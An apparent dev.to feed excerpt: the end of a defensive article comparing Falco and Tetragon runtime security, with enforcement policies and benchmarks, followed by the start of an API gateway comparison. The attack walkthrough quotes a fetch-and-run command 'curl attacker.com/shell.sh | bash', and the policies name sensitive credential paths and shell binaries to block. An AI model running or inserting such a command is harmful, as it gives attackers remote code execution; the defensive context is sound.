&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;TracingPolicy&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;protect-sensitive-files&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;kprobes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;call&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;security_file_open"&lt;/span&gt;
      &lt;span class="na"&gt;syscall&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
      &lt;span class="na"&gt;args&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;index&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;
          &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;file"&lt;/span&gt;
      &lt;span class="na"&gt;selectors&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;matchArgs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;index&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt;
              &lt;span class="na"&gt;operator&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Prefix&lt;/span&gt;
              &lt;span class="na"&gt;values&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/etc/shadow&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/etc/kubernetes/pki&lt;/span&gt;
          &lt;span class="na"&gt;matchActions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;action&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Sigkill&lt;/span&gt;
          &lt;span class="na"&gt;matchNamespaces&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pid&lt;/span&gt;
              &lt;span class="na"&gt;operator&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;NotIn&lt;/span&gt;
              &lt;span class="na"&gt;values&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;host_ns"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Deploy Tetragon:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;helm &lt;span class="nb"&gt;install &lt;/span&gt;tetragon cilium/tetragon &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; kube-system &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; tetragon.exportFilename&lt;span class="o"&gt;=&lt;/span&gt;/var/run/cilium/tetragon/tetragon.log &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; tetragon.enablePolicyFilter&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--set&lt;/span&gt; tetragon.enableMsgHandlingLatency&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
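&lt;p&gt;Once Tetragon is running, enforcement actions land in the JSON export configured above. A small helper for auditing kills from that log — the &lt;code&gt;KPROBE_ACTION_SIGKILL&lt;/code&gt; string follows the shape of Tetragon's exported &lt;code&gt;process_kprobe&lt;/code&gt; events, so confirm it against your version's output:&lt;/p&gt;

```shell
# count_sigkills: count enforcement (SIGKILL) events in a Tetragon export log.
# The action string assumes Tetragon's process_kprobe JSON event shape.
count_sigkills() {
  grep -c '"action":"KPROBE_ACTION_SIGKILL"' "$1"
}
```

&lt;p&gt;Point it at the &lt;code&gt;exportFilename&lt;/code&gt; path from the Helm install, e.g. &lt;code&gt;count_sigkills /var/run/cilium/tetragon/tetragon.log&lt;/code&gt;.&lt;/p&gt;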



&lt;h2&gt;
  
  
  Real Attack Scenario: The Compromised npm Package
&lt;/h2&gt;

&lt;p&gt;Let's walk through a realistic attack and see how each tool responds.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The attack&lt;/strong&gt;: A developer installs a compromised npm package that, on import, spawns a child process running &lt;code&gt;curl attacker.com/shell.sh | bash&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Falco response&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Detects &lt;code&gt;bash&lt;/code&gt; spawned as child of &lt;code&gt;node&lt;/code&gt; (rule: "Shell Spawned by Non-Shell Program")&lt;/li&gt;
&lt;li&gt;Detects outbound network connection from &lt;code&gt;bash&lt;/code&gt; (rule: "Reverse Shell Detected")&lt;/li&gt;
&lt;li&gt;Sends alert to Slack + Alertmanager&lt;/li&gt;
&lt;li&gt;Total time from exploit to alert: &lt;strong&gt;~800ms&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Total time from exploit to human response: &lt;strong&gt;3-47 minutes&lt;/strong&gt; (depending on alerting pipeline and on-call response)&lt;/li&gt;
&lt;li&gt;The shell has been running the entire time&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Tetragon response&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;code&gt;bash&lt;/code&gt; spawned as child of &lt;code&gt;node&lt;/code&gt; -- logged but allowed (process spawn is legitimate in many apps)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;bash&lt;/code&gt; attempts TCP connection -- &lt;strong&gt;SIGKILL sent in ~3 microseconds&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Process dies. Connection never established.&lt;/li&gt;
&lt;li&gt;Event exported for audit trail&lt;/li&gt;
&lt;li&gt;Total time from exploit to containment: &lt;strong&gt;&amp;lt;1ms&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The attacker got nothing. Not a single byte of data exfiltrated.&lt;/p&gt;

&lt;h2&gt;
  
  
  Performance Impact
&lt;/h2&gt;

&lt;p&gt;Security tools that slow your workloads are security tools that get disabled. We measured both on a 50-pod Kubernetes cluster running a mixed workload (API servers, message consumers, batch jobs):&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;No security&lt;/th&gt;
&lt;th&gt;Falco&lt;/th&gt;
&lt;th&gt;Tetragon&lt;/th&gt;
&lt;th&gt;Both&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CPU overhead (per node)&lt;/td&gt;
&lt;td&gt;baseline&lt;/td&gt;
&lt;td&gt;+1.8%&lt;/td&gt;
&lt;td&gt;+0.9%&lt;/td&gt;
&lt;td&gt;+2.5%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory overhead (per node)&lt;/td&gt;
&lt;td&gt;baseline&lt;/td&gt;
&lt;td&gt;+180MB&lt;/td&gt;
&lt;td&gt;+95MB&lt;/td&gt;
&lt;td&gt;+260MB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Syscall latency (p99)&lt;/td&gt;
&lt;td&gt;baseline&lt;/td&gt;
&lt;td&gt;+2.1μs&lt;/td&gt;
&lt;td&gt;+0.8μs&lt;/td&gt;
&lt;td&gt;+2.7μs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network latency (p99)&lt;/td&gt;
&lt;td&gt;baseline&lt;/td&gt;
&lt;td&gt;+0.3μs&lt;/td&gt;
&lt;td&gt;+0.2μs&lt;/td&gt;
&lt;td&gt;+0.4μs&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Tetragon is measurably lighter than Falco. This surprised us initially, but it makes sense: Tetragon does its evaluation in-kernel via eBPF, while Falco copies events to a userspace process for rule evaluation. The kernel/userspace context switch adds overhead.&lt;/p&gt;

&lt;p&gt;Both tools are light enough to run simultaneously without meaningful production impact.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to Use Which (Or Both)
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Use Falco when:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You need comprehensive audit logging (compliance requirements like SOC 2, PCI DSS)&lt;/li&gt;
&lt;li&gt;You want visibility into container behavior before writing enforcement policies&lt;/li&gt;
&lt;li&gt;Your rules need complex logic that eBPF can't express (Falco's rule engine is more flexible)&lt;/li&gt;
&lt;li&gt;You're just starting with runtime security and need to understand your baseline&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Use Tetragon when:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You know what should never happen and want to prevent it, not just detect it&lt;/li&gt;
&lt;li&gt;You need sub-millisecond response to threats&lt;/li&gt;
&lt;li&gt;You're running Cilium for networking (Tetragon integrates natively)&lt;/li&gt;
&lt;li&gt;You want enforcement at the kernel level without a userspace bottleneck&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Use both when:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You want defense in depth: Tetragon blocks known-bad, Falco detects unknown-suspicious&lt;/li&gt;
&lt;li&gt;Compliance requires both prevention and audit trails&lt;/li&gt;
&lt;li&gt;You're running a high-security workload (financial services, healthcare)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Our Recommended Architecture
&lt;/h2&gt;

&lt;p&gt;For most production Kubernetes clusters, we deploy both:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌─────────────────────────────────────────────┐
│ Kernel Level                                │
│  Tetragon eBPF → ENFORCE known threats      │
│  Falco eBPF    → DETECT suspicious activity │
└──────────────┬──────────────┬───────────────┘
               │              │
        ┌──────▼──────┐ ┌────▼──────────┐
        │ Tetragon    │ │ Falco         │
        │ Export JSON │ │ Sidekick      │
        └──────┬──────┘ └────┬──────────┘
               │              │
        ┌──────▼──────────────▼───────────┐
        │ Loki / Elasticsearch            │
        │ (unified security event store)  │
        └──────────────┬──────────────────┘
                       │
        ┌──────────────▼──────────────────┐
        │ Grafana Dashboards + Alerts     │
        └─────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Tetragon handles the "never let this happen" policies (reverse shells, crypto miners, sensitive file access). Falco handles the "this looks weird, investigate" alerts (unusual process trees, unexpected network connections, privilege escalation attempts).&lt;/p&gt;
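&lt;p&gt;The unified event store can be wired with a few configuration fragments. A sketch assuming Falcosidekick's documented Loki output and a Promtail scrape of Tetragon's export file — the &lt;code&gt;loki.monitoring:3100&lt;/code&gt; endpoint and label names are placeholders for your environment:&lt;/p&gt;

```yaml
# Falco chart values: ship alerts to Loki via Falcosidekick.
# (hostport is an assumed in-cluster Loki address — adjust to yours)
falcosidekick:
  enabled: true
  config:
    loki:
      hostport: "http://loki.monitoring:3100"
---
# Promtail scrape config: tail Tetragon's JSON export into the same store.
scrape_configs:
  - job_name: tetragon
    static_configs:
      - targets: [localhost]
        labels:
          job: tetragon
          __path__: /var/run/cilium/tetragon/tetragon.log
```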

&lt;h2&gt;
  
  
  The Migration Path
&lt;/h2&gt;

&lt;p&gt;If you're running Falco today and considering Tetragon:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Deploy Tetragon in &lt;strong&gt;observe-only mode&lt;/strong&gt; (no &lt;code&gt;Sigkill&lt;/code&gt; actions) alongside Falco&lt;/li&gt;
&lt;li&gt;Run for 2 weeks. Compare Tetragon events against Falco alerts. Verify coverage overlap.&lt;/li&gt;
&lt;li&gt;Convert your highest-confidence Falco rules to Tetragon enforcement policies (start with reverse shells and crypto miners -- lowest false-positive risk)&lt;/li&gt;
&lt;li&gt;Gradually move more rules to enforcement as confidence grows&lt;/li&gt;
&lt;li&gt;Keep Falco for detection of novel threats that don't match enforcement patterns&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Don't rip out Falco and replace it with Tetragon overnight. The tools are complementary, and the migration needs bake time.&lt;/p&gt;
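&lt;p&gt;Step 1's observe-only mode is just the enforcement policy with the kill swapped for an event post. A sketch, assuming Tetragon's &lt;code&gt;Post&lt;/code&gt; action:&lt;/p&gt;

```yaml
# Observe-only variant of kill-reverse-shells: log the event, kill nothing.
# Assumes Tetragon's Post action; diff its events against Falco alerts
# for two weeks before flipping back to Sigkill.
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-reverse-shells
spec:
  kprobes:
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchBinaries:
            - operator: In
              values:
                - /bin/bash
                - /bin/sh
                - /bin/dash
          matchActions:
            - action: Post
```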




&lt;p&gt;&lt;em&gt;Container runtime security is one of the most impactful and least implemented layers of Kubernetes security. We help teams deploy, tune, and operate runtime security at scale. &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;Get in touch&lt;/a&gt; if you want to stop detecting breaches and start preventing them.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>devops</category>
      <category>infosec</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>API Gateway Patterns: Kong vs Envoy vs Traefik in 2025</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Tue, 05 May 2026 06:00:04 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/api-gateway-patterns-kong-vs-envoy-vs-traefik-in-2025-1d46</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/api-gateway-patterns-kong-vs-envoy-vs-traefik-in-2025-1d46</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/api-gateway-patterns-kong-envoy-traefik" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;








&lt;h2&gt;
  
  
  The API Gateway Role
&lt;/h2&gt;

&lt;p&gt;An API gateway sits between clients and your backend services. It handles cross-cutting concerns so your services do not have to: authentication, rate limiting, request routing, load balancing, caching, and observability.&lt;/p&gt;

&lt;p&gt;API gateway pattern: a single entry point handles auth, rate limiting, and routing to backend services.&lt;/p&gt;

&lt;p&gt;Without an API gateway, every service implements its own auth middleware, rate limiter, and logging. With one, you centralize these concerns.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Three Contenders
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Kong: The Full-Featured Gateway
&lt;/h3&gt;

&lt;p&gt;Kong started as an Nginx-based API gateway and evolved into a comprehensive API management platform. It is the most feature-rich option.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Kong with Docker Compose&lt;/span&gt;
&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;kong-database&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres:16&lt;/span&gt;
    &lt;span class="na"&gt;environment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;POSTGRES_DB&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kong&lt;/span&gt;
      &lt;span class="na"&gt;POSTGRES_USER&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kong&lt;/span&gt;
      &lt;span class="na"&gt;POSTGRES_PASSWORD&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;secret&lt;/span&gt;

  &lt;span class="na"&gt;kong&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kong:3.8&lt;/span&gt;
    &lt;span class="na"&gt;environment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;KONG_DATABASE&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres&lt;/span&gt;
      &lt;span class="na"&gt;KONG_PG_HOST&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kong-database&lt;/span&gt;
      &lt;span class="na"&gt;KONG_PG_USER&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kong&lt;/span&gt;
      &lt;span class="na"&gt;KONG_PG_PASSWORD&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;secret&lt;/span&gt;
      &lt;span class="na"&gt;KONG_PROXY_LISTEN&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;0.0.0.0:8000&lt;/span&gt;
      &lt;span class="na"&gt;KONG_ADMIN_LISTEN&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;0.0.0.0:8001&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;8000:8000"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;8001:8001"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Kong route configuration&lt;/strong&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Create a service&lt;/span&gt;
curl &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nt"&gt;-X&lt;/span&gt; POST http://localhost:8001/services/ &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; &lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;user-service &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; &lt;span class="nv"&gt;url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;http://user-api:3000

&lt;span class="c"&gt;# Create a route&lt;/span&gt;
curl &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nt"&gt;-X&lt;/span&gt; POST http://localhost:8001/services/user-service/routes &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; paths[]&lt;span class="o"&gt;=&lt;/span&gt;/api/users &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; &lt;span class="nv"&gt;strip_path&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;false&lt;/span&gt;

&lt;span class="c"&gt;# Add rate limiting plugin&lt;/span&gt;
curl &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nt"&gt;-X&lt;/span&gt; POST http://localhost:8001/services/user-service/plugins &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; &lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;rate-limiting &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; config.minute&lt;span class="o"&gt;=&lt;/span&gt;100 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; config.policy&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;local&lt;/span&gt;

&lt;span class="c"&gt;# Add JWT authentication&lt;/span&gt;
curl &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="nt"&gt;-X&lt;/span&gt; POST http://localhost:8001/services/user-service/plugins &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--data&lt;/span&gt; &lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;jwt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
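&lt;p&gt;The same setup also fits Kong's declarative (DB-less) format, which is easier to keep in version control than Admin API calls. A sketch mirroring the curl commands above, following Kong's declarative config format:&lt;/p&gt;

```yaml
# kong.yml — declarative equivalent of the Admin API calls above.
_format_version: "3.0"
services:
  - name: user-service
    url: http://user-api:3000
    routes:
      - name: user-route
        paths:
          - /api/users
        strip_path: false
    plugins:
      - name: rate-limiting
        config:
          minute: 100
          policy: local
      - name: jwt
```

&lt;p&gt;Run Kong with &lt;code&gt;KONG_DATABASE: "off"&lt;/code&gt; and &lt;code&gt;KONG_DECLARATIVE_CONFIG&lt;/code&gt; pointing at this file to skip Postgres entirely.&lt;/p&gt;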



&lt;h3&gt;
  
  
  Envoy: The Programmable Proxy
&lt;/h3&gt;

&lt;p&gt;Envoy is a high-performance L4/L7 proxy designed for cloud-native architectures. It is the data plane for Istio and many other service meshes.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# envoy.yaml&lt;/span&gt;
&lt;span class="na"&gt;static_resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;listeners&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;main&lt;/span&gt;
      &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;socket_address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;address&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;0.0.0.0&lt;/span&gt;
          &lt;span class="na"&gt;port_value&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;8080&lt;/span&gt;
      &lt;span class="na"&gt;filter_chains&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;filters&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;envoy.filters.network.http_connection_manager&lt;/span&gt;
              &lt;span class="na"&gt;typed_config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;@type"&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager&lt;/span&gt;
                &lt;span class="s"&gt;stat_prefix&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ingress&lt;/span&gt;
                &lt;span class="s"&gt;route_config&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;
                  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;local_route&lt;/span&gt;
                  &lt;span class="na"&gt;virtual_hosts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api&lt;/span&gt;
                      &lt;span class="na"&gt;domains&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;api.example.com"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
                      &lt;span class="na"&gt;routes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;match&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                            &lt;span class="na"&gt;prefix&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/api/users"&lt;/span&gt;
                          &lt;span class="na"&gt;route&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                            &lt;span class="na"&gt;cluster&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;user-service&lt;/span&gt;
                        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;match&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                            &lt;span class="na"&gt;prefix&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/api/orders"&lt;/span&gt;
                          &lt;span class="na"&gt;route&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                            &lt;span class="na"&gt;cluster&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;order-service&lt;/span&gt;
                            &lt;span class="na"&gt;retry_policy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                              &lt;span class="na"&gt;retry_on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;5xx"&lt;/span&gt;
                              &lt;span class="na"&gt;num_retries&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3&lt;/span&gt;
              &lt;span class="err"&gt;  &lt;/span&gt;&lt;span class="na"&gt;http_filters&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;envoy.filters.http.router&lt;/span&gt;
                    &lt;span class="na"&gt;typed_config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
                      &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;@type"&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s"&gt;type.googleapis.com/envoy.extensions.filters.http.router.v3.Router&lt;/span&gt;

  &lt;span class="na"&gt;clusters&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;user-service&lt;/span&gt;
      &lt;span class="na"&gt;connect_timeout&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;5s&lt;/span&gt;
      &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;STRICT_DNS&lt;/span&gt;
      &lt;span class="na"&gt;load_assignment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;cluster_name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;user-service&lt;/span&gt;
